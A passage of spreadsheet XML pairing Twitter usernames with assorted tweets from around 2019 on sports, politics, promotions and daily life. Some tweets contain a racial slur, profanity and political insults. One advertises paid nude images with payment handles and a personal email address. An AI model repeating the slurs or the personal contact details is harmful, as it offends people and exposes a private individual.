  </si>
  <si>
    <t>ReekSoTrill</t>
  </si>
  <si>
    <t>@amourbiggie Hol Up lemme fix dat tweet</t>
  </si>
  <si>
    <t>stuartbarlow8</t>
  </si>
  <si>
    <t>@BetwaySupport Lovely, Haller and Mane off the mark.. interesting day to come tomorrow!</t>
  </si>
  <si>
    <t>suso_fan</t>
  </si>
  <si>
    <t>@DerPuristJdP Poch's football can be entertaining when they build up through the middle, best example was the 4-1 against Liverpool a few seasons ago. Not enough is said about how bad Pep is at in-game management too</t>
  </si>
  <si>
    <t>Peeeples</t>
  </si>
  <si>
    <t>Saw two white boys overdosed on drugs in target parking lot lookin dumb af in the parking lot talkin bout help smh fuckin thugs</t>
  </si>
  <si>
    <t>MonicaMcPherrin</t>
  </si>
  <si>
    <t>How to Generate More Traffic with Google’s New Features https://t.co/KjajlogbBY @neilpatel #GoogleMyBusiness #google https://t.co/Ufeul4Ui0l</t>
  </si>
  <si>
    <t>firkin_ron</t>
  </si>
  <si>
    <t>Hey @dylanlifts871, Thank you for the follow!</t>
  </si>
  <si>
    <t>FoxLakeDL</t>
  </si>
  <si>
    <t>A library card is a great first step towards academic success and lifelong learning. September is Library Card Sign-Up Month. Visit your library today! We'll have a special Space Ranger guest in the lobby all month! Come get your picture taken! #LibraryCardSignUp https://t.co/ETNy1PFTeU</t>
  </si>
  <si>
    <t>iCarlyFan2009</t>
  </si>
  <si>
    <t>It 10:00PM(PT), Good Night to @selenagomez &amp; Sweet Dream...</t>
  </si>
  <si>
    <t>PhilPdale</t>
  </si>
  <si>
    <t>Why ChuckleVision is the greatest CBBC show ever | Television &amp; radio | The Guardian https://t.co/6HN4rLwPlF</t>
  </si>
  <si>
    <t>mmpnorcalregion</t>
  </si>
  <si>
    <t>#Pinole #MountainMikes is looking for fundraisers! https://t.co/QXuP5Eda9L</t>
  </si>
  <si>
    <t>chenlemaid</t>
  </si>
  <si>
    <t>@prettyjaems THE BESTEST BOY</t>
  </si>
  <si>
    <t>mt_newman</t>
  </si>
  <si>
    <t>@GrittyNHL Did he spit on the ground after pwning?</t>
  </si>
  <si>
    <t>petergreenhill5</t>
  </si>
  <si>
    <t>@TheNerve7 @peterwalker99 @AyoCaesar She was a bit vague on costings. With a general election possible as early as 24th October, costings of Labour's programme need to be sorted.</t>
  </si>
  <si>
    <t>OMANXL1</t>
  </si>
  <si>
    <t>#TerribleTerrificTuesday, #discosoul, #JanetJackson, #JimmyJam, #TerryLewis Janet Jackson - What Have You Done For Me Lately https://t.co/epIixRLAwv</t>
  </si>
  <si>
    <t>Vicky8675309</t>
  </si>
  <si>
    <t>@ihateu4321 @artist180 I don't trust the rules of twitter where misgendering a person gets them banned. Saying there are only two sexes gets people banned. I don't trust the platform or anyone to censor ideas. I'm fine with blocking but censorship is dangerous imo.</t>
  </si>
  <si>
    <t>shanrisko</t>
  </si>
  <si>
    <t>@TrisSali ilym I can’t wait to see u</t>
  </si>
  <si>
    <t>KING_KAGINS</t>
  </si>
  <si>
    <t>@MLB @Dodgers @astros @Yankees @Twins @Braves YanKees have the best record WTF!!!</t>
  </si>
  <si>
    <t>ssladdict</t>
  </si>
  <si>
    <t>Kudos to @Plesk, for "A+" TLS encryption on https://t.co/8bZKJljk3A - good example for others #SSL #ssltls #TLS</t>
  </si>
  <si>
    <t>JeanEsdrace</t>
  </si>
  <si>
    <t>We are talking about trillions of dollars to be made. There is no room for jokes and time to play.</t>
  </si>
  <si>
    <t>NAMETAGALXNDR</t>
  </si>
  <si>
    <t>“Know Bodiez” prod. by @_nameless @DJDDT on the mix. S/O to @slumvillage Out now on all music streaming services courtesy of @Soulspazm. https://t.co/2vcbS6YimP</t>
  </si>
  <si>
    <t>GenevaInHell</t>
  </si>
  <si>
    <t>@HeyK23 @Tom_Bergeron He lied incessantly and defended a sexual predator. Oh, and remember when he said that Hitler didn’t use chemical weapons? This is the guy you want @BrunoTonioli fawning over, @ABC? WTF is wrong with you, @RobertIger?@ABCNetwork @ABCNewsPR @ritaferro @Tom_Bergeron #BoycottDWTS</t>
  </si>
  <si>
    <t>retail_pkg</t>
  </si>
  <si>
    <t>Find out the winner of this year’s RPA Distributor of the Year Award at the 2020 Power of Packaging Event! Last year’s winner was The Packaging Source! https://t.co/zWRPIBAPOm</t>
  </si>
  <si>
    <t>mywherehaus</t>
  </si>
  <si>
    <t>The latest 🐾 THE COLLAR CLUB 🐾! https://t.co/sCrP1uNksd Thanks to @HolaMichael @focuslady @dogshockcollar3 #cats #catlovers</t>
  </si>
  <si>
    <t>ZAGG_Support</t>
  </si>
  <si>
    <t>@jenna_spence The replacement is free of charge, but we do charge a small shipping fee. We're sorry for any confusion, Jenna. You can find our warranty terms here: https://t.co/PwaLt7yJQ2. Thank you for reaching out to us, we'll pass on your feedback.</t>
  </si>
  <si>
    <t>Massawyrm</t>
  </si>
  <si>
    <t>@LaserMWebber She's the new Belinda Carlisle!</t>
  </si>
  <si>
    <t>PressRelease_cc</t>
  </si>
  <si>
    <t>U.S. Department of Transportation Authorizes 21 Air, LLC to provide U.S.-Mexico All Cargo Scheduled Service https://t.co/ocf2ehAlJv</t>
  </si>
  <si>
    <t>IsiahTAWPIN</t>
  </si>
  <si>
    <t>@9inetyy8ightt @liyahkl This ain’t about my sis, ain’t nun’ wrong with ha’! She one of the few that keep the TL entertained. #HoeIsLife</t>
  </si>
  <si>
    <t>willsherratt</t>
  </si>
  <si>
    <t>@Skramerwrites All I remember is Browning jr coming in at Cal last year and immediately throwing a pick 6. I’m with you, still would be shocked if Eason isn’t the guy</t>
  </si>
  <si>
    <t>DubbyGoodell</t>
  </si>
  <si>
    <t>Contrary to popular belief the first time airplanes were used in a terroristic attack on US soil was Tulsa 1921 not NYC 2001 😌</t>
  </si>
  <si>
    <t>mlxtriceh</t>
  </si>
  <si>
    <t>Only regret i have about moving to Texas is this heat lol. Cause I definitely sweat too much for this</t>
  </si>
  <si>
    <t>LUUAdvice</t>
  </si>
  <si>
    <t>"Let’s talk smoke free campus…and vaping" - Check out the latest blog from the Health &amp; Wellbeing Project's Maisie. Including 3 tips on supporting a friend to quit. https://t.co/zsuShURvDY @UoLStudents #smokefree #smokefreecampus #smoking #vaping https://t.co/qUwyeKlvhs</t>
  </si>
  <si>
    <t>Mikesey21</t>
  </si>
  <si>
    <t>Never trust a nigga who wear a turtle neck in the summer</t>
  </si>
  <si>
    <t>FemmeFox</t>
  </si>
  <si>
    <t>@MythrilShield I did think this was why you were asking initially. Just helping people see that for very obvious reasons we've all calmed down a bit so of course growth slows down as well. Amd that's OK and normal. Maintaining that kind of growth is incredibly difficult and even tiring.</t>
  </si>
  <si>
    <t>NuclearAnthro</t>
  </si>
  <si>
    <t>@ilovaussiesheps Mmmmm pez. Please give Zeva extra pets in thanks. She has my sweet treat for tonight! MILKSHAKE OR PIE?!?</t>
  </si>
  <si>
    <t>MsThomas315</t>
  </si>
  <si>
    <t>I just wanna cuddle and have my ass rubbed</t>
  </si>
  <si>
    <t>mentietie</t>
  </si>
  <si>
    <t>Love love love I have so many and by far this is my favorite https://t.co/m791cukZ9o 来自 @amazon</t>
  </si>
  <si>
    <t>CaptainDory</t>
  </si>
  <si>
    <t>@JenAshleyWright Camelot was a gateway drug for me at 14, and it will live on forever in my heart. That music and so many others: My Fair Lady, Guy and Dolls, Wicked, Hamilton, Les Miz, Miss Saigon, Little Shop, and now, Moulin Rouge (a playlist at this point), are the soundtracks to my life.</t>
  </si>
  <si>
    <t>mph247</t>
  </si>
  <si>
    <t>Normanton pontefract and castleford labour party : Deselect MP Yvette Cooper from our constituency - Sign the Petition! https://t.co/t3zuTpIQZJ via @UKChange</t>
  </si>
  <si>
    <t>a_maag30</t>
  </si>
  <si>
    <t>@NickCaminoWKYC What’s the over/under on postponing games in April?</t>
  </si>
  <si>
    <t>Kalikid951</t>
  </si>
  <si>
    <t>Fucking boom Gears 2 on hardcore done. Now I have insane unlocked for the original trilogy back to Gears 1 it is to start the insane playthrough of the Trilogy. https://t.co/5qH1NRuzQx</t>
  </si>
  <si>
    <t>Jmekaforbz</t>
  </si>
  <si>
    <t>@crazyassnika Ok!!! I just need my eyebrows wax. Idk nobody up this way to do it.</t>
  </si>
  <si>
    <t>lexiqarciaaa</t>
  </si>
  <si>
    <t>A little wake-up call is exactly what is needed to bring insig... More for Leo https://t.co/vmySdpnqI5</t>
  </si>
  <si>
    <t>oregonvirginia</t>
  </si>
  <si>
    <t>@realDonaldTrump The finest anywhere were also gunned down in Dayton and are now dead, you f*cking cretin.</t>
  </si>
  <si>
    <t>aweebnamedkemi</t>
  </si>
  <si>
    <t>I’ve had enough to eat. Time to go home.</t>
  </si>
  <si>
    <t>WLKYMark</t>
  </si>
  <si>
    <t>Central Bank wins country ham auction with $1 million bid at @KYFB’s Ky Country Ham Breakfast at the Ky State Fair. Ham by Penn Farm in Taylor County.</t>
  </si>
  <si>
    <t>Ibtbanksy</t>
  </si>
  <si>
    <t>I wanna wake up to bacon in the morning</t>
  </si>
  <si>
    <t>leyla_moon_</t>
  </si>
  <si>
    <t>@LilleyDennese @JonFlan Agree. Nose profile is completely different and it isn’t bruised so why did his nasal bone grow? 🤔</t>
  </si>
  <si>
    <t>MarkJKremer</t>
  </si>
  <si>
    <t>You show me that the Dayton shooter cited a liberal politician in some manifesto and I'll be the first to condemn the political side of it. Until then shut the fuck up with your false equivalency and understand that dehumanizing a group of people from the oval office ends badly.</t>
  </si>
  <si>
    <t>Jvstintvrner_</t>
  </si>
  <si>
    <t>@OG_Scottie I was at AllSups and scraped really bad, it hurt</t>
  </si>
  <si>
    <t>manovak43</t>
  </si>
  <si>
    <t>@RepLizCheney What did a grizzly bear do to you? Get in your garbage, ransack your cellar?</t>
  </si>
  <si>
    <t>sisisis57</t>
  </si>
  <si>
    <t>@kimmysuedav @SenToddYoung And other countries do not believe the crazies have rights. They lock them in jails and hospitals and throw away the key. In America we give them rights, lawyers, disability and places to live, even if it's a tent in a park.</t>
  </si>
  <si>
    <t>GibinatorGaming</t>
  </si>
  <si>
    <t>@UnderxMind @usagitales So there's a movie called Leprechaun 6 back to tha hood. Where there's a white guy trying to get the right to use the n-word and he ends up going "c'mon man what if I say ninja"</t>
  </si>
  <si>
    <t>flowers_am</t>
  </si>
  <si>
    <t>Thank you Emma for your lovely review, it was our pleasure to create your wedding flowers for you both, many congratulations xxx #weddingflorist #customercare #5starreview https://t.co/i08WfW56FO</t>
  </si>
  <si>
    <t>IamBoomerr</t>
  </si>
  <si>
    <t>I can’t wait to put the ideas me and @PartiallyRoyal think of to video form. The relaunch of my channel is going to be the videos I always wanted to do and I’m pumped!</t>
  </si>
  <si>
    <t>Just_Kittie</t>
  </si>
  <si>
    <t>@cedarpoint So awesome wish our local park @WaldaTweets would take notice of all the things you do for your loyal customers. Officially gold pass holders &amp; well worth the drive! Ride on Cedar Point</t>
  </si>
  <si>
    <t>vvandevate</t>
  </si>
  <si>
    <t>Want to know what I've been up to lately? NFP's federal team has been working hard to advocate for programs that improve the health of women, children, &amp; families. We've met with over 80 Congressional offices! Sign up for @NFP_nursefamily updates here: https://t.co/8ZC0YPiu5X</t>
  </si>
  <si>
    <t>jjfizz</t>
  </si>
  <si>
    <t>Parkdean Competition - Freedom to Go https://t.co/Z3XPDJQ0WY</t>
  </si>
  <si>
    <t>pinkpajamas51</t>
  </si>
  <si>
    <t>@t_smoove_goody Fuck them all. Still Bernie and a little kamala</t>
  </si>
  <si>
    <t>thecrunchymommy</t>
  </si>
  <si>
    <t>Keeping It Real: I Talked To My Daughter About Puberty And Her Period https://t.co/MroY2TWRoU</t>
  </si>
  <si>
    <t>pfsez</t>
  </si>
  <si>
    <t>@adrianturner01 ...that his death, and resurrection paid the price for sins and we need only repent of ours and be baptized (buried with him) in his name and our sins will be covered by the same righteous blood that allowed him to resurrect.</t>
  </si>
  <si>
    <t>lmhart726</t>
  </si>
  <si>
    <t>@dthreetwo @NewsHour @AprilDRyan @Yamiche Trump is off the rails.</t>
  </si>
  <si>
    <t>RehanaFaisalH</t>
  </si>
  <si>
    <t>Thanks to Hazel Simons, leader @lutoncouncil, the Mayor of Luton, Cllr Tahir Malik, Luton North MP Kelvin Hopkins &amp; Luton South MP @gavinshuker for raising concerns about the situation in Kashmir with @DominicRaab #StandWithKashmir https://t.co/aTNMDf7WHt</t>
  </si>
  <si>
    <t>VaughnCrone</t>
  </si>
  <si>
    <t>@Marcelvanst @Plantmore1 @trevor_doty @garthbrooks Brandt Center open for shelter. Just sneak the wife into the men’s washroom! Women’s line ridiculous!!!</t>
  </si>
  <si>
    <t>KailyMcphail_xo</t>
  </si>
  <si>
    <t>Fate and free will are two sides of the same coin. With countl... More for Cancer https://t.co/XDbTBBgYIV</t>
  </si>
  <si>
    <t>tribe_radio</t>
  </si>
  <si>
    <t>Sister Sledge - He's the Greatest Dancer</t>
  </si>
  <si>
    <t>DurhamTourism</t>
  </si>
  <si>
    <t>The @Chevrolet Silverado 250 is back from August 23 to 25 at @CTMPofficial in #Clarington! 🏎️ Making its only Canadian appearance is @NASCAR_Trucks. 🤩🏁 For more details, visit our August e-newsletter: https://t.co/dk0YOAQMnj. ✨ #CTMPlife #ThisIsClarington #DurhamTourism https://t.co/Cn0hbfwGTS</t>
  </si>
  <si>
    <t>KillinQuillen</t>
  </si>
  <si>
    <t>Next is the island of misfit toys. These are all plants that I did not intend to buy, but were chemically burned or rotting and were brought home to be loved. 💚 https://t.co/ClTdC3bbwi</t>
  </si>
  <si>
    <t>LosPinosWinery</t>
  </si>
  <si>
    <t>'ROSE' ALL DAY' this labor day weekend with our featured wines: 2017 Rosato &amp; Pinky Tuscandero. Stop by the tasting room or shop online at https://t.co/telfA4wLKj and save 20% on all bottles purchased. Cheers! https://t.co/EwxrRjYkMW</t>
  </si>
  <si>
    <t>Gary38880302</t>
  </si>
  <si>
    <t>@dbongino Wow this Dylan dude has not idea as to what our second amendment means. I’m a good guy with a gun and have never killed anyone. Even during my tour in the Marine Corps. So get off you sheep ass and learn something. You can’t have our guns ever 🤨</t>
  </si>
  <si>
    <t>ball82811</t>
  </si>
  <si>
    <t>$TCEL IS GONNA BE MASSIVE THIS IS THE NEW WEBSITE https://t.co/LENAwdPYdd</t>
  </si>
  <si>
    <t>sinyister</t>
  </si>
  <si>
    <t>@AllStarPromos22 cash $louie3212 PP scarlettsinyister@gmail.com venmo louie3212 over 100 nudes for 25 all weekend long https://t.co/Dj3SLKPKNX</t>
  </si>
  <si>
    <t>heyitsgorjess</t>
  </si>
  <si>
    <t>@kyllewallker Exactly, totally disregarding the whole LOVE aspect of Christianity .</t>
  </si>
  <si>
    <t>Miss_Mary_Lu</t>
  </si>
  <si>
    <t>@beetleatbay Sending you hugs and deeeep breaths 💖💖💖💖</t>
  </si>
  <si>
    <t>Stewie0</t>
  </si>
  <si>
    <t>@shootall28 @TeaPainUSA Ikr? It's weird. And scary.</t>
  </si>
  <si>
    <t>Iluvcheapstuff</t>
  </si>
  <si>
    <t>✅ Auto Applies at checkout ✅ 🛒https://t.co/UsFSukVxq9 Save 50% on the eligible item(s) below. ‼️Prices &amp; codes VALID at time posted ‼️ 🚫No price or product guarantee🚫 #DEAL #SALE #PROMO #PROMOTION https://t.co/s9fQrrOZ2s</t>
  </si>
  <si>
    <t>FortyFourSpcl</t>
  </si>
  <si>
    <t>This Kentucky voter thinks this is a big load of Bravo Sierra &amp; the leftist scum @universityofky needs to be held accountable, needs to pay the price for this discriminatory practice. Don't you agree, @drdanbentley @KYSenateGOP @KYHouseGOP @kysenatepres? https://t.co/cmykft6xpI</t>
  </si>
  <si>
    <t>JohnBuc08179594</t>
  </si>
  <si>
    <t>⁦@danielmkim⁩ Thought you’d be interested in this. Overlooked No More: Lau Sing Kee, War Hero Jailed for Helping Immigrants - The New York Times https://t.co/YXf4anpxnz</t>
  </si>
  <si>
    <t>d3d4football</t>
  </si>
  <si>
    <t>➡️Cambridge hoping to add midfield signing before weekend Read more here👇 https://t.co/9ucVbxBVTb #camUTD https://t.co/wpjkO0xdzV</t>
  </si>
  <si>
    <t>kev_core1</t>
  </si>
  <si>
    <t>@_justineburnett @adamblevins_ Mmmmhm...it definitely takes more than 4 years. We had a damn class speaker saying an associates could take up to 4 years and a bachelors up to 6. My god damn associates degree took me 5 years. Fuck!</t>
  </si>
  <si>
    <t>Shava_Flava</t>
  </si>
  <si>
    <t>Back in the gym today let’s get it 💪🏼</t>
  </si>
  <si>
    <t>ghaliahj15</t>
  </si>
  <si>
    <t>One of the reasons why I love watching anime is the Precision of everything they feature 😍 https://t.co/HiEGBSBBtC</t>
  </si>
  <si>
    <t>MrsKEDavis</t>
  </si>
  <si>
    <t>The 9th Princess is like scrappy do... #princessweiyoung</t>
  </si>
  <si>
    <t>lee_b65</t>
  </si>
  <si>
    <t>@JamesCleverly Oh yeah, all the tories want is to rip off the country and deliver a fraudulent referendum. Stop trying to pass the buck, the tories are the criminals and will pay for their treachery.</t>
  </si>
  <si>
    <t>dude_largepants</t>
  </si>
  <si>
    <t>I finally dropped my pull of Batman because I can't take Tom Kings' awful storytelling anymore. I can wait a year and jump back on when he's (hopefully)gone.</t>
  </si>
  <si>
    <t>TradeDirectLtd</t>
  </si>
  <si>
    <t>The BBC speaks out and informs us, “motor theft insurance claim payouts hit their highest level in seven years at the start of 2019.” This is due to new car models being built with a keyless entry system! Some models can be taken in less than 10 https://t.co/4lNTcb0rHQ</t>
  </si>
  <si>
    <t>bradfordmusicco</t>
  </si>
  <si>
    <t>The latest The Boar's Missing Tongue! https://t.co/pD5lJWm7Mv Thanks to @Crash_Records @Approach_pr @Pulse1Radio #police #socialcare</t>
  </si>
  <si>
    <t>sarahcrawford77</t>
  </si>
  <si>
    <t>Leaving the harbour 🎣 . . #offwego #sailaway #fishingtrip #fishingtrips #outtosea #boat #fishingboat #sea #ocean #beautifulday #dunbar #dunbarharbour #scotland #scotland_insta #scotlandexplore #scotlandtravel… https://t.co/AVXGrKEJt9</t>
  </si>
  <si>
    <t>SteveGsRightPeg</t>
  </si>
  <si>
    <t>@Cesar67__ @anthony19641888 @ClydeSSB You want knocked out of Europe to give you a better chance of winning the league, wow that’s Tim pot material that</t>
  </si>
  <si>
    <t>scottvillalobos</t>
  </si>
  <si>
    <t>Attention everyone I know, ignore any message or friend request from Andrea Wilson. She's a hacker and trying to hack you.</t>
  </si>
  <si>
    <t>okhobieman2002</t>
  </si>
  <si>
    <t>@Iran @realDonaldTrump @JZarif Stop the enrichment.</t>
  </si>
  <si>
    <t>OliviaMSaldivar</t>
  </si>
  <si>
    <t>Genuinely don’t understand why people try to be sneaky if that’s the case then leave me alone</t>
  </si>
  <si>
    <t>jumpeight</t>
  </si>
  <si>
    <t>@brithume Amen to that!</t>
  </si>
  <si>
    <t>secretsteinbeck</t>
  </si>
  <si>
    <t>Ask for More! Sam reached Level 34 in BINGO Blitz! https://t.co/5PATxRkxjW</t>
  </si>
  <si>
    <t>joannaguigsy</t>
  </si>
  <si>
    <t>@BobLen10 You can’t pick her for all three lol</t>
  </si>
  <si>
    <t>ThinkyTexan</t>
  </si>
  <si>
    <t>@Tachyon100 @DaniellaCarlisi You wouldn't need That much area. 21,000 sq mi. of solar panels would power the entire US. The yellow square is all it would take... https://t.co/CxgwCkk3gz</t>
  </si>
  <si>
    <t>BaeHader</t>
  </si>
  <si>
    <t>@Grantairesbiga1 I already shared my fav fics with you, but you know which else is up there?? Your blockbuster AU 👌🏻❤️</t>
  </si>
  <si>
    <t>provo_macher</t>
  </si>
  <si>
    <t>@LucyMadAsHeck That's God's grace for you! Ye shall not be judged on ignorance and sloth.</t>
  </si>
  <si>
    <t>MccluskeyMindi</t>
  </si>
  <si>
    <t>@rmck51337 @djkrisholiday @TulsiGabbard Sadly, it appears u confused a brutal consolidation of power &amp; shakedown to recover assets stolen by family from family for some sort of policy reform. As a professor of history, I recommend u find some reliable sources on the Saudi system.</t>
  </si>
  <si>
    <t>RSheaLancaster1</t>
  </si>
  <si>
    <t>@Sethrogen Just letting you know I’m about to watch The Green Hornet</t>
  </si>
  <si>
    <t>Lips45Lips</t>
  </si>
  <si>
    <t>@J_Panzoo @agomes_47 Offer! Offer! Amazon Offer! If you want this offer submit the link: https://t.co/nij2Vgobfk</t>
  </si>
  <si>
    <t>150NAHI</t>
  </si>
  <si>
    <t>bouta dress a bitch up n den cuddle</t>
  </si>
  <si>
    <t>90feetfromhome</t>
  </si>
  <si>
    <t>@prescott_greg Oh that's cool. I recall after Aretha Franklin died the Tigers did themed game notes with her song titles. not quite the same, but I love stuff like that.</t>
  </si>
  <si>
    <t>jellyshahdesign</t>
  </si>
  <si>
    <t>15 Of The #BestPlaces To Order #CustomT-Shirts Online https://t.co/Yw4EQFfaxo</t>
  </si>
  <si>
    <t>Peynut23</t>
  </si>
  <si>
    <t>Who’s going to carry the boats?</t>
  </si>
  <si>
    <t>WOLFEE666</t>
  </si>
  <si>
    <t>Climate change experts agree on the last place they'd invest for the future: waterfront property - Business Insider https://t.co/Fx4G3V6Kd9</t>
  </si>
  <si>
    <t>truenorthhd</t>
  </si>
  <si>
    <t>@thogbot I began a Skyblock series on my YouTube if you wanna check it out?! Maybe leave a SUB? That would be AWESOME! IM ALSO DOING A GIVEAWAY! CHECK OUT THE GIVEAWAY VIDEO ON MY CHANNEL AND FOLLOW THE DIRECTIONS! LINK BELOW👇🏼❤️ https://t.co/nzJvyK7ufc</t>
  </si>
  <si>
    <t>Jmb3d</t>
  </si>
  <si>
    <t>@krystalball @BernieSanders This may sound crazy, but why can't we have a Federal jobs guarantee and UBI using the methods that both candidates are proposing?</t>
  </si>
  <si>
    <t>mattdsain</t>
  </si>
  <si>
    <t>Today, unions fight to hold on to these achievements. When unions succeed so does our economy. Before we go and enjoy a long weekend it's important that we take time to remember why. Take 5 minutes to read a brief history of labor in the U.S. 3/3 https://t.co/4cFrYNY8eC</t>
  </si>
  <si>
    <t>AtlBizChron</t>
  </si>
  <si>
    <t>Instead of hunting for bigger office space when it hit a growth spurt last year, Intrepid Experiential joined the fast-growing trend of co-working. https://t.co/rjPAH3cd9F</t>
  </si>
  <si>
    <t>ElliMacpherson</t>
  </si>
  <si>
    <t>The fact Cerys hasn’t got a job this summer incase I have another breakdown and she need to come to Sheffield to be there for me is actually mental😂😂 not sure what I’d do without that girl</t>
  </si>
  <si>
    <t>TapTheThirdHole</t>
  </si>
  <si>
    <t>@BernkBestGirl @RodentMessiah @AdmiralAegis Leading us to create gods in our image to explain the patterns we see. People then having hallucinations or thoughts and misattributing them to this magical creator, and a combination of those things, resulting in a cascade of morality perverted by little more than imagination.</t>
  </si>
  <si>
    <t>SilhanaED</t>
  </si>
  <si>
    <t>Ya girl is actually going to do her Overwatch placements before the last week of the season this time! Get hyped!</t>
  </si>
  <si>
    <t>BenjaminJDawson</t>
  </si>
  <si>
    <t>7 AM conference call the morning after that game? https://t.co/gfTd45eNY2</t>
  </si>
  <si>
    <t>bri_himpele</t>
  </si>
  <si>
    <t>I hope like all the good old Disney shows are on Disney plus. Like that’s so raven, Phil of the future, Hannah Montana, suite life, Kim possible, all them por favor @disneyplus</t>
  </si>
  <si>
    <t>swiftlydelicat</t>
  </si>
  <si>
    <t>@nicoleee_veee This is the best thing ever.</t>
  </si>
  <si>
    <t>CHHolte</t>
  </si>
  <si>
    <t>@Trumpgot2go @frankandjannie @belskie @Willis_Hubbard_ @ERMA_____ @andrerucker51 @elaineyvette1 @BerzinskyM @Elmonndo @Lololupus @bannerite @APGsMom @adair1946 @Susann_Sayz @pduetswithBabs @BarReNaples @originlbookgirl @JameelWSimmons @RobertandRosie @irenedorsey321 @JWaReesS @Tillmantinman @PearlieMaeJones @tvitin @Oprah @60Minutes @eji_org @MinnieBellW @OWNTV @GodsWordIsFree @LarryWoolfolk @BFostersbox @rainrainrain77 @Fun_Investor @funder @The_Dixon_Cider @Eemunchagote @Comey @PattyMurray @SenatorReid @bosslady2898 @GWBLibrary @GeorgeWBush @POTUS44 @JoeBiden @BilldeBlasio @HillaryClinton @CarterLibrary @Obamalibrary His Trumpeters want that too. Some of them want to kill people to get there. That is why this is so dangerous. The fools would throw away their own liberty to keep those in control pasty white.</t>
  </si>
  <si>
    <t>SaintsForecast</t>
  </si>
  <si>
    <t>@_JaCobey @IanHow33 He’s not a premium position and he doesn’t have elite stats for his position( though that’s due to lower work load)</t>
  </si>
  <si>
    <t>DanHartRSC</t>
  </si>
  <si>
    <t>@SJMJ91 In front of the camera yeah.</t>
  </si>
  <si>
    <t>lizcurran</t>
  </si>
  <si>
    <t>@passingshotpod @andy_murray He might use his protected ranking to get in instead.</t>
  </si>
  <si>
    <t>HeidiTaylorCaud</t>
  </si>
  <si>
    <t>I'm visiting @teachcaudill's classes next week to talk about 1918 flu pandemic. In 2016 I helped nurse educators Mary Ann Thompson &amp; Sara Bolten with their research on topic. Excited to be sharing excerpts of their published article &amp; primary sources from archives with students. https://t.co/JtlX0VjATS</t>
  </si>
  <si>
    <t>YourTecShop1</t>
  </si>
  <si>
    <t>👉👉👉 Mini LED Projector for Home The best accesories, quality, shipping and service!!!! Visit us!!!! 👉👉👉 https://t.co/oSLDlISANR https://t.co/a4NFDkWRN5</t>
  </si>
  <si>
    <t>diana_muriel</t>
  </si>
  <si>
    <t>When faced with a long-distance #relocation, hiring a #movingcompany is a smart move. Do the research to save money. https://t.co/RsmkgVoSQ0 https://t.co/E4FQ10BKUF</t>
  </si>
  <si>
    <t>JacquesDupuis6</t>
  </si>
  <si>
    <t>Steve Says: While Trump haters pray for a recession, the real economy is... https://t.co/QrEUWkgsg9 via @YouTube</t>
  </si>
  <si>
    <t>stvillainelle</t>
  </si>
  <si>
    <t>@andthejets RIGHT.... hits different when you experienced The Loss :/</t>
  </si>
  <si>
    <t>theguydf</t>
  </si>
  <si>
    <t>Idea: Like "pro choice" and "pro life", but instead, "pro gun control" and "pro innocent people being killed".</t>
  </si>
  <si>
    <t>LisaTalmadge</t>
  </si>
  <si>
    <t>@__WeStandUnited @Rennibeth13 I apologize specifically to you Jewels. I should have left you out of it entirely. I was wrong on that. I am sorry.</t>
  </si>
  <si>
    <t>BlindOldDedFred</t>
  </si>
  <si>
    <t>i'm not sure how much of my dysphoria is because i'm trans and how much is because i don't have fangs and claws</t>
  </si>
  <si>
    <t>commandtech</t>
  </si>
  <si>
    <t>“Complete Vindication”: Judge Shoots Down Absurd DNC Lawsuit Against Trump – The Mad Patriots https://t.co/yvrILJmPgi</t>
  </si>
  <si>
    <t>tr_williams</t>
  </si>
  <si>
    <t>Known animal abusers at Carden International Circus are headed to these venues— take action now via @PETA! https://t.co/Xp8WfP2C90</t>
  </si>
  <si>
    <t>NickyPlayzYT</t>
  </si>
  <si>
    <t>Who wants a follow?follow for follow.</t>
  </si>
  <si>
    <t>itsjonny_</t>
  </si>
  <si>
    <t>@emmaawright @VibePay the dream 💸</t>
  </si>
  <si>
    <t>CookingWthSound</t>
  </si>
  <si>
    <t>MIDI wind controllers have always been kind of an underreported rarity: expensive, prone to difficulty, and... who really wants them? So imagine my excitement when I saw this: a digital harmonica with high-precision pressure sensors! https://t.co/xadcrHj0pp https://t.co/8HL8WFrXSk</t>
  </si>
  <si>
    <t>whoisrico</t>
  </si>
  <si>
    <t>@calamityjon I play to a VERY limited audience.</t>
  </si>
  <si>
    <t>loli_loby</t>
  </si>
  <si>
    <t>Calling all animal lovers. Dogs in caged area, several males with "in heat" females torn to shreds, reported to Rescue Joseph's Legacy, rescued. Today Middletown, Ohio ACO animal control, wants to give back to owner ..... WTH? Sometimes we need to be the voice Contact local gov https://t.co/YN6YNF5tr5</t>
  </si>
  <si>
    <t>BrunelliMichael</t>
  </si>
  <si>
    <t>@Reagan_doubleU @SuperCharged33 @chasecameron_ @IsadoraKemper10 @Jeffbear80 @Atrainliner @BrunelliSports @DarrellNeloms @FarabaughFB @jcinok @t_demint @therealinformer @Countryboi567 @Me With the 165th pick in the #MovieMock draft, Walt Disney selects... John Wick. @DarrellNeloms and SkoolHouse Productions are now on the clock. https://t.co/ZP3MJ8s7Ua</t>
  </si>
  <si>
    <t>heartinglouis</t>
  </si>
  <si>
    <t>@tmhdoncaster don’t think it’s just the page number! it’s something important but i absolutely have no idea what exactly it could mean expect for the album title or a song title or some kind of announcement of the next single as in how many days/weeks left until the release! or the exact day</t>
  </si>
  <si>
    <t>anfieldroad</t>
  </si>
  <si>
    <t>#LFC Team news: Confirmed Liverpool line-up v Arsenal (Official site) https://t.co/Ks6zFm65OB</t>
  </si>
  <si>
    <t>KCRG_FirstAlert</t>
  </si>
  <si>
    <t>Your current conditions and radar this hour. https://t.co/IRqLwqC5y6</t>
  </si>
  <si>
    <t>TimInTheIce</t>
  </si>
  <si>
    <t>Lips are way more potent than they were back in the 60s. https://t.co/MroMpilDUu</t>
  </si>
  <si>
    <t>DAdStanich</t>
  </si>
  <si>
    <t>@Scaramucci @POTUS I am HERE for these baseball metaphors</t>
  </si>
  <si>
    <t>PrinceAdam17</t>
  </si>
  <si>
    <t>Happy birthday bull dog @bullet168 you still owe me £50. Keep it for ya bday x</t>
  </si>
  <si>
    <t>RebelxoVonnie__</t>
  </si>
  <si>
    <t>Give others what you value in order to keep it present in your... More for Aquarius https://t.co/JLIy2MYavD</t>
  </si>
  <si>
    <t>tomfcreo</t>
  </si>
  <si>
    <t>@ClimateNewsHub The ABC reported a while ago that Global Warming was causing the Pacific Islands to grow, not shrink https://t.co/VN89NZHXiy</t>
  </si>
  <si>
    <t>Texas_Eric1</t>
  </si>
  <si>
    <t>@TravisJ8180 @maziehirono @realDonaldTrump Yes, the left is mirroring Hitler, Stalin and other socialist parties rise to power</t>
  </si>
  <si>
    <t>KentaMacroHusky</t>
  </si>
  <si>
